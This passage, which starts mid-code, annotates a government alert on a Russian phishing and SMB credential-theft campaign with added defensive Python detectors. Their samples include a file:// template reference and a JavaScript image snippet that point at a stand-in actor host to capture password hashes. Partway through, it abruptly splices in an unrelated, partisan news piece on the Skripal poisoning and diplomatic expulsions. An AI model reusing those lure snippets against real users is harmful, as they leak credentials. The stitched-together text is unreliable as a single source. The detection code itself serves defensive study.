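        pkg.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed samples; 192.0.2.10 stands in for the actor-controlled host.
    lure = build_sample_docx("file://192.0.2.10/Normal.dotm")
    print(suspicious_rels(lure))
    benign = build_sample_docx("file:///C:/Users/alice/Templates/Normal.dotm")
    print(suspicious_rels(benign))
    js = ('var i = document.createElement("img");\n'
          'i.src = "file://192.0.2.10/ame_icon.png"; i.width = 3; i.height = 2;')
    print(suspicious_web_refs(js))
```

Run it against a mail-gateway quarantine or a web root with a loop over files; the relationship check is deliberately not limited to attachedTemplate, because an external image or OLE relationship triggers the same SMB connection. The regex excludes file:///C:/ style local paths, which legitimate template references commonly use, so they do not produce noise.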
Stage 3: Delivery
When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled “``document.pdf”. (Note the two backticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted them for an email address and password. (Note: no code within the PDF initiated a download.)
In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.
Stage 4: Exploitation
The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects: http://bit[.]ly/2m0x8IH redirected to http://tinyurl[.]com/h3sdqck, which redirected to the ultimate destination, http://imageliners[.]com/nitel. The imageliners[.]com website contained input fields for an email address and password, mimicking a login page.
When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior with the Dragonfly threat actors in this campaign. [1]
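Whatever the lure, the hash leaves the network only if the client can reach TCP 445 or 139 on an external host, so the cheapest control and the cheapest check are both at the egress firewall. The script below is an added example, not part of the alert. It reads firewall events in a simple key=value syslog format (an assumed format; adapt the regex to your firewall’s output) and reports every internal host that attempted outbound SMB to a non-RFC1918 address, together with whether the firewall allowed the connection. The sample lines are constructed; their destinations reuse the two actor-controlled addresses named in the watering-hole snippets above.

```python
"""Egress check for the TCP 445/139 credential leak described in the alert:
find internal hosts that tried to reach SMB on external addresses.
Added example with an assumed key=value firewall log format."""
import ipaddress
import re

SMB_PORTS = {445, 139}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
KV = re.compile(r"(\w+)=(\S+)")


def is_internal(ip):
    """True for RFC1918 space; anything else is treated as external."""
    return any(ip in net for net in INTERNAL_NETS)


def outbound_smb_attempts(lines):
    """Return one record per log line where an internal source attempted a
    TCP connection to port 445 or 139 on an external destination.  Lines that
    do not parse are skipped rather than raising, since syslog feeds are noisy."""
    findings = []
    for line in lines:
        f = dict(KV.findall(line))
        try:
            src = ipaddress.ip_address(f["src"])
            dst = ipaddress.ip_address(f["dst"])
            dport = int(f["dport"])
        except (KeyError, ValueError):
            continue
        if f.get("proto", "").lower() != "tcp" or dport not in SMB_PORTS:
            continue
        if is_internal(src) and not is_internal(dst):
            findings.append({
                "src": str(src), "dst": str(dst), "dport": dport,
                "action": f.get("action", "unknown"),
                # An allowed connection means the NTLM exchange could complete;
                # a denied one still identifies the host that opened the lure.
                "hash_exposed": f.get("action") == "allow",
            })
    return findings


# Constructed sample events; destinations are the two actor-controlled IPs
# quoted in the alert's watering-hole snippets.
SAMPLE_LOG = [
    "2018-03-14T10:02:11Z fw01 action=allow proto=tcp src=10.20.30.40 sport=49211 dst=192.168.1.5 dport=445",
    "2018-03-14T10:02:13Z fw01 action=allow proto=tcp src=10.20.30.40 sport=49212 dst=62.8.193.206 dport=445",
    "2018-03-14T10:02:15Z fw01 action=deny proto=tcp src=10.20.30.41 sport=49300 dst=184.154.150.66 dport=139",
    "2018-03-14T10:02:16Z fw01 action=allow proto=tcp src=10.20.30.41 sport=49301 dst=62.8.193.206 dport=443",
    "2018-03-14T10:02:17Z fw01 action=allow proto=udp src=10.20.30.42 sport=5353 dst=224.0.0.251 dport=5353",
    "malformed line with no fields",
]

if __name__ == "__main__":
    for hit in outbound_smb_attempts(SAMPLE_LOG):
        print(hit)
```

A hit with hash_exposed set means the credential hash for whoever opened the document or visited the page should be treated as compromised and the password rotated; a denied attempt still tells you which workstation to pull the lure from. The internal-to-internal line (a file server on 192.168.1.5) is correctly ignored, since blocking SMB inside the network is not the point of this check.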
Stage 5: Installation
The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.
Establishing Local Accounts
The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.
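Account creation of this kind leaves a reliable trail in the Windows Security log: event 4720 (a user account was created) followed by event 4732 (a member was added to a security-enabled local group) whose target group is BUILTIN\Administrators, the well-known SID S-1-5-32-544. The correlation below is an added example, not part of the alert. It assumes the events have been exported as one JSON object per line carrying the standard field names (EventID, TimeCreated, Computer, SubjectUserName, TargetUserName, TargetSid, MemberSid), and the sample records, including the account name backup_svc and the host name SEPM01, are constructed.

```python
"""Correlate Windows Security events to surface accounts that were created
and then promoted to the local Administrators group within a short window,
the persistence pattern described in the alert.  Added example; the JSON
export format and the sample records are assumed/constructed."""
import json
from datetime import datetime, timedelta

EVENT_USER_CREATED = 4720          # "A user account was created"
EVENT_LOCAL_GROUP_ADD = 4732       # "A member was added to a security-enabled local group"
LOCAL_ADMINS_SID = "S-1-5-32-544"  # well-known SID of BUILTIN\Administrators


def new_local_admins(json_lines, window_seconds=3600):
    """Return one finding per account that was created (4720) and added to
    Administrators (4732) within `window_seconds`.  Events are matched on
    SID rather than name, so renaming the account between the two events
    does not evade the check."""
    window = timedelta(seconds=window_seconds)
    events = sorted((json.loads(line) for line in json_lines),
                    key=lambda e: e["TimeCreated"])
    created = {}   # SID of a newly created account -> (timestamp, 4720 event)
    findings = []
    for ev in events:
        when = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == EVENT_USER_CREATED:
            created[ev["TargetSid"]] = (when, ev)
        elif (ev["EventID"] == EVENT_LOCAL_GROUP_ADD
              and ev["TargetSid"] == LOCAL_ADMINS_SID):
            hit = created.get(ev["MemberSid"])
            if hit is None:
                continue   # existing account promoted; a different review item
            created_at, c = hit
            if timedelta(0) <= when - created_at <= window:
                findings.append({
                    "host": ev.get("Computer", "?"),
                    "account": c["TargetUserName"],
                    "sid": ev["MemberSid"],
                    "created_by": c["SubjectUserName"],
                    "created_at": c["TimeCreated"],
                    "promoted_at": ev["TimeCreated"],
                    "promoted_by": ev["SubjectUserName"],
                })
    return findings


# Constructed sample export.  The first pair mimics a script run under the
# endpoint-protection service account creating a "backup" admin.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 4720, "TimeCreated": "2018-03-14T10:02:11", "Computer": "SEPM01",
                "SubjectUserName": "svc_sepm", "TargetUserName": "backup_svc",
                "TargetSid": "S-1-5-21-1111-2222-3333-1105"}),
    json.dumps({"EventID": 4732, "TimeCreated": "2018-03-14T10:02:40", "Computer": "SEPM01",
                "SubjectUserName": "svc_sepm", "TargetUserName": "Administrators",
                "TargetSid": "S-1-5-32-544", "MemberSid": "S-1-5-21-1111-2222-3333-1105"}),
    # Long-standing account added to Administrators: no matching 4720, not reported.
    json.dumps({"EventID": 4732, "TimeCreated": "2018-03-14T11:15:00", "Computer": "SEPM01",
                "SubjectUserName": "admin", "TargetUserName": "Administrators",
                "TargetSid": "S-1-5-32-544", "MemberSid": "S-1-5-21-1111-2222-3333-1002"}),
    # New account that only joins Remote Desktop Users (S-1-5-32-555): not reported.
    json.dumps({"EventID": 4720, "TimeCreated": "2018-03-14T12:00:00", "Computer": "SEPM01",
                "SubjectUserName": "admin", "TargetUserName": "contractor",
                "TargetSid": "S-1-5-21-1111-2222-3333-1106"}),
    json.dumps({"EventID": 4732, "TimeCreated": "2018-03-14T12:00:30", "Computer": "SEPM01",
                "SubjectUserName": "admin", "TargetUserName": "Remote Desktop Users",
                "TargetSid": "S-1-5-32-555", "MemberSid": "S-1-5-21-1111-2222-3333-1106"}),
]

if __name__ == "__main__":
    for finding in new_local_admins(SAMPLE_EVENTS):
        print(finding)
```

The finding includes who performed both steps; a creation performed by a service account such as the endpoint-protection manager’s, as in the constructed sample, is the detail that distinguishes an attacker’s script from a help-desk ticket. Pair this with an inventory check of the Symantec Endpoint Protection Manager Tomcat webapps directory for .jsp files that are not part of the product install, since that is where the alert reports the dropper was staged.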
Amb Haley Nails Russia over Poison Use in UK
The Russian delegation was sitting three chairs away from Ambassador Nikki Haley as she slammed Russia for its actions against Britain, including the use of poison and Putin’s disdainful response to Prime Minister Theresa May.
See the secret trial of the chemical weapon from Russia here.
As PM May expels almost two dozen Russian diplomats (in reality, intelligence officers), one wonders: if Britain knew they were in the country, why were they not expelled previously? One theory is that Russian operatives applied the nerve agent Novichok to the door handles of Skripal’s car. There was also the earlier case of the poisoned telephone:
Accounts of security deficiencies at weapons facilities indicate that, at least for a period in the 1990s, Moscow was not in firm control of its chemical weapons stockpiles or the people guarding them.
When Russian banking magnate Ivan Kivelidi and his secretary died in 1995 from organ failure after a military-grade poison was found on the telephone receiver of his Moscow office, an employee of a state chemical research institute confessed to having secretly supplied the toxin.
In a closed-door trial, Kivelidi’s business partner was convicted of poisoning Kivelidi over a dispute. At the trial, prosecutors said the business partner had obtained the poison, via several intermediaries, from Leonard Rink, an employee of a state chemical research institute known as GosNIIOKhT.
The same institute, according to Vil Mirzayanov, a Soviet chemical weapons scientist who later turned whistleblower, was part of the state chemical weapons programme and helped develop the “Novichok” family of nerve agents that Britain has said was responsible for poisoning Skripal. More here.
BRITAIN today ordered 23 Russian spooks to leave the country within a week in response to the spy poisoning scandal.
Theresa May told MPs that two dozen so-called diplomats who are in fact spies will be kicked out in a bid to stop Vladimir Putin meddling in Britain.
The PM said Russia had shown “contempt and defiance” in the aftermath of an attempt to kill ex-spy Sergei Skripal and warned that the poisoning represented “the unlawful use of force by Russia against the United Kingdom”.
She also confirmed that no ministers or members of the Royal Family will attend this summer’s World Cup in Russia – but stopped short of calling on the England team to pull out of the tournament.
Putin’s officials responded with fury, saying Britain’s tough response was “unacceptable, unjustified and shortsighted”.
But Jeremy Corbyn sparked anger when he suggested that Russia might NOT be behind the attack and compared the investigation to claims about Saddam Hussein’s WMDs.
Mrs May also announced this afternoon:
- New laws to help Britain defend itself from all forms of hostile Russian activity
- Flights and goods from Russia will face extra checks to stop ill-gotten gains entering the UK
- All planned talks with Russian officials, including a visit from the foreign minister, are cancelled
- Assets belonging to Putin’s government will be frozen to stop them being used for wrongdoing
- Suspected spies could be detained at Britain’s borders like terrorists under new powers
- The UK’s allies France, Germany and the US are in full support of her tough stance
The expulsion of 23 Russian spies is the toughest act of its kind for 30 years – and will almost certainly spark a tit-for-tat diplomatic war, with British diplomats likely to be kicked out of Moscow.
Mrs May told the House of Commons: “To those who seek to do us harm, our message is clear – you are not welcome here.”
Blasting Putin’s refusal to respond to her demand for an explanation, the PM said: “It was right to offer Russia the opportunity to provide an explanation.
“But their response has demonstrated complete disdain for the gravity of these events. They have provided no credible explanation that could suggest they lost control of their nerve agent.
“No explanation as to how this agent came to be used in the United Kingdom; no explanation as to why Russia has an undeclared chemical weapons programme in contravention of international law.
“Instead they have treated the use of a military grade nerve agent in Europe with sarcasm, contempt and defiance.
“There is no alternative conclusion other than that the Russian state was culpable for the attempted murder of Mr Skripal and his daughter – and for threatening the lives of other British citizens in Salisbury, including Detective Sergeant Nick Bailey.
“This represents an unlawful use of force by the Russian State against the United Kingdom.”
What we know so far:
- Theresa May announced she would kick out 23 diplomats in the wake of the Sergei Skripal case.
- The Russian Embassy has responded by calling the expulsion ‘unacceptable, unjustified and shortsighted’.
- The Prime Minister also confirmed government officials and members of the Royal family would not be attending the World Cup in Russia.
- Vladimir Putin ignored a deadline set by the PM to explain his involvement in the poisoning and instead warned Britain ‘not to threaten a nuclear power’.
- Skripal and daughter Yulia remain in a critical condition in hospital after being exposed to a nerve agent in Salisbury on March 4.
- The hunt for clues has now been extended 25 miles away to Gillingham, Dorset.
- Russian exiles have now been asked by cops to help identify a mystery couple aged between 35 and 40 seen close to Skripal and his daughter before they collapsed.
- Russian exile Nikolai Glushkov was discovered dead with ‘strangulation marks’ on his neck on Monday night by daughter Natalia Glushkova in New Malden, South West London.
- Anti-terror cops are investigating the 68-year-old’s ‘unexplained’ death because of the ‘associations’ he reportedly had.
Any Russian spies who try to re-enter Britain will now be stopped at the border in the same way as terror suspects, the PM said.
She announced that sanctions on human rights violators will be stepped up, and vowed to freeze the assets of the Russian regime if they are being used to meddle in the UK.
Mrs May added: “We will continue to bring all the capabilities of UK law enforcement to bear against serious criminals and corrupt elites. There is no place for these people – or their money – in our country.”
Foreign minister Sergei Lavrov, who was due to visit Britain shortly, has had his invitation withdrawn, she announced.
The PM said: “I continue to believe it is not in our national interest to break off all dialogue between the United Kingdom and the Russian Federation.
“But in the aftermath of this appalling act against our country, this relationship cannot be the same.”
And she warned Putin that Britain will not stand alone, revealing that Donald Trump, Emmanuel Macron and Angela Merkel have promised to present a united front against Russian atrocities.
But Jeremy Corbyn caused fury by immediately taking political potshots, as he brought up cuts to our diplomatic capability.
He also said he agreed with Russia that we should hand over a sample of the nerve agent used to them too.
The leftie Labour boss was heckled by Tory MPs as he suggested we should maintain a “robust dialogue” with Russia.
And he used his comments to snipe at Foreign Secretary Boris Johnson, saying he was “demeaning” his office.
Mrs May lashed out at Labour for refusing to join together with the Government in a time of national crisis.
“They could have taken the opportunity to condemn the culpability of the Russian state,” she stormed.
And Mr Corbyn’s own MPs joined the anger as they pledged support for the Prime Minister’s actions.
But some Labour supporters claim the attack on Mr Skripal was a “false flag” designed to damage the party leader, The Sun revealed today.
The Russian embassy in London responded to Mrs May’s statement with fury, saying: “We consider this hostile action as totally unacceptable, unjustified and shortsighted.
“All the responsibility for the deterioration of the Russia-UK relationship lies with the current political leadership of Britain.”
After today’s escalation of hostilities, Brits visiting Russia were warned they must avoid talking publicly about politics in case they attract the regime’s attention.
The Foreign Office updated its travel advice for the country, telling tourists they could face “anti-British sentiment or harassment”.
Officials added: “You’re advised to remain vigilant, avoid any protests or demonstrations and avoid commenting publicly on political developments.”
The Russian regime has refused to explain its role in the attempted hit – saying it will take at least ten days to respond to the PM’s ultimatum.
And ambassador Alexander Yakovenko went further today, saying: “Everything done today is absolutely unacceptable and we consider this a provocation.
“The UK should follow international law. They have to present the request to the organisation and we are happy to consider this within the ten days.
“We believe this is a very serious provocation and of course we are not ready to talk.”
It has emerged that police are looking for a mysterious couple who may be witnesses to the attack on Mr Skripal and his daughter while the investigation has widened from Salisbury to Gillingham.
The PM set Russia a deadline of midnight last night to explain how nerve agent novichok came to be used in the brazen attack – but the regime responded by taunting Britain and boasting about its nuclear arsenal.
Mrs May held a meeting of the National Security Council this morning, before returning to the Commons to outline the next steps in the campaign to punish Russia for the assassination attempt.
Britain has also called for an emergency meeting of the UN Security Council in a bid to hold the regime to account, while the UK’s Nato allies pledged to stand firm alongside us.
This morning Sergei Lavrov, the Russian foreign minister, made the bizarre claim that Russia hasn’t actually received a formal request for information from the UK.
He said Putin’s government would take ten days to respond once the official message is received.